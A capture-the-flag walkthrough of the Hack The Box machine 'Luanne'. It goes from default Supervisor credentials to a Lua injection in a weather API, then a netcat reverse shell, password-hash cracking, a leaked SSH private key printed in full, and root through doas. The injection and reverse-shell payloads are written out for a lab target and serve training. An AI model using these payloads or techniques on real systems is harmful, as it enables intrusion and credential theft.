Luanne

Name: Luanne
Release Date: 28 Nov 2020
Retire Date: 27 Mar 2021
OS: Linux/Other
Base Points: Easy - Retired [0]
Rated Difficulty:
Radar Graph:
jkr 00 days, 01 hours, 34 mins, 11 seconds
xct 00 days, 01 hours, 50 mins, 24 seconds
Creator: polarbearer
Pentest Workshop PDF: Luanne.pdf

Again, we start with sudo /home/kali/AutoRecon/src/autorecon/autorecon.py 10.10.10.218

Sidenote: Newer versions of Kali that do not use root by default require sudo whenever checking UDP ports.

The main open ports we need to look into are HTTP TCP 80 and HTTP TCP 9001.  Navigating to either 80 or 9001, it immediately asks for a user name and password, which we don't have....yet. Fortunately, autorecon's XML outputs shows us that port 9001 is running Medusa Supervisor Process Manager. We can do a simple DuckDuckGo (privacy XD) for Medusa default credentials and find this site:

 

https://developpaper.com/supervisor-process-manager/

 

which tells us that the default credentials are user:123. Trying those credentials allows us to log in and see the Supervisor panel.

Let's check out what each of these is about, in particular the processes monitor, which appears to be a ps -aux output.

OK, this is interesting. There are 2 processes (PID 318 and 391) that are running localhost:3000 & 3001 respectively. 3000 looks to be running weather.lua under httpd_devel.pid. Time for more searching, but let's see if there's any additional directores under http://10.10.10.218:3000/weather using:

 

gobuster dir -k -e -r -u http://10.10.10.218/eather -w /usr/share/seclists/Discovery/Web-Content/directory-list-2.3-medium.txt -x "asp,aspx,bak,bat,c,cfm,cgi,css,com,dll,exe,git,htm,html,inc,jhtml,js,jsa,jsp,log,mdb,nsf,pcap, php,php2,php3,php4,php5,php6,php7,phps,php.bak,pht,phtml,pl,reg,sh,shtml,sql,swf,txt,xm" -s "200,204,301,302,307"

-t50 -o Luanne.out

 

We find a /forecast directory. When we navigate to it, we get a 200 response, but with a little bit more information on how we can use the forecast call.

So, if we add ?city=list to that, the response should provide us with a list of locations, but could also be a potential exploit vector. For example, LUA httpd requests are sometimes vulnerable to code execution attacks:

 

http://10.10.10.218/weather/forecast?city=curl -v "http://10.10.10.218/weather/forecast?city=')+os.execute('id')+--" 

 

would be an example of a LUA RCE vector. Let's check against that. Notice, we have to change to the RAW DATA tab of the response, but LUA RCE has been confirmed!  Let's see if we can use that to create a reverse shell using:

 

http://10.10.10.218/weather/forecast?city=curl -v "http://10.10.10.218/weather/forecast?city=')+os.execute('rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 10.10.16.4 1337 >/tmp/f')+--"

 

Now we'll have URL the rm string, so the command ends up being:

 

http://10.10.10.218/weather/forecast?city=curl%20-v%20%22http%3A%2F%2F10.10.10.218%2Fweather%2Fforecast%3Fcity%3D%27%29%2Bos.execute%28%27rm%20%2Ftmp%2Ff%3Bmkfifo%20%2Ftmp%2Ff%3Bcat%20%2Ftmp%2Ff%7C%2Fbin%2Fsh%20-i%202%3E%261%7Cnc%2010.10.16.4%201337%20%3E%2Ftmp%2Ff%27%29%2B--%22

Now, we have a shell as httpd. We need to move laterally and then privesc. First thing we can grab, it the .htaccess password hash and crack it in John The Ripper.

 

$ cat ./.htpasswd
webapi_user:$1$vVoNCsOl$lMtBS6GL2upDbR4Owhzyc0

$john --wordlist=/usr/share/wordlists/rockyou.txt hash

webapi_user:iamthebest

 

What's with everyone thinking they're the best? Any who... Now that we have another set of credentials, let's see if we can make any headway with that lateral movement I was talking about. <MANY hours later> I finally found something that works. I never thought to pass the credentials in curl directly from the box and grab directories and file contents.

 

curl --user webapi_user:iamthebest localhost:3001/~r.michaels/ and then

curl --user webapi_user:iamthebest localhost:3001/~r.michaels/id_rsa

 

-----BEGIN OPENSSH PRIVATE KEY-----
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
-----END OPENSSH PRIVATE KEY-----

 

Bingo! SSH key and a good "pause" point if we need to. Copy it into a key file on your attack machine and:

 

ssh -i id_rsa r.micheals@10.10.10.218

 

and we have a shell and can grab the user.txt flag.

 

luanne$ cat user.txt                                                                                                     
ea5f0ce6a917b0be1eabc7f9218febc0

 

On to privesc. One of the first things we find is a backups directory and more importantly, the backups in that directory. So, no one interrupts what we're doing (or visa versa), let's copy that backup file into a different directory. /tmp will wipe everything after a few minutes, so we need to move fast.  From the /home/r.michaels/backups folder, run:

 

cp ./devel_backup-2020-09-16.tar.gz.enc /tmp/devel.tar.gz

cd /tmp

netpgp --decrypt --output=devel_backup-2020-09-16.tar.gz devel_backup-2020-09- 16.tar.gz.enc

tar xvzf devel_backup-2020-09-16.tar.gz

 

You'll see it extract another .htpasswd file!  Cat it quickly.

 

cat /tmp/devel-2020-09-16/www/.htpasswd

 

Now we can place that into a new hashfile and run it through John like we did the other.

 

luanne$ cat devel-2020-09-16/www/.htpasswd
webapi_user:$1$6xc7I/LW$WuSQCS6n3yXsjPMSmwHDu.
 

Backed up hash will crack to littlebear.

Now NetBSD doesn't have "sudo" per se, but uses "doas" which is essentially the same thing. LinEnum/LinPEAS shows that doas allows r.michaels to permit as root, but needs the root password.... We do have littlebear. Let's try it.

 

doas sh

Password: littlebear

#

 

We win! Grab the proof info and we've completed another box.

 

# cat /root/root.txt
7a9b5c206e8e8ba09bb99bd113675f66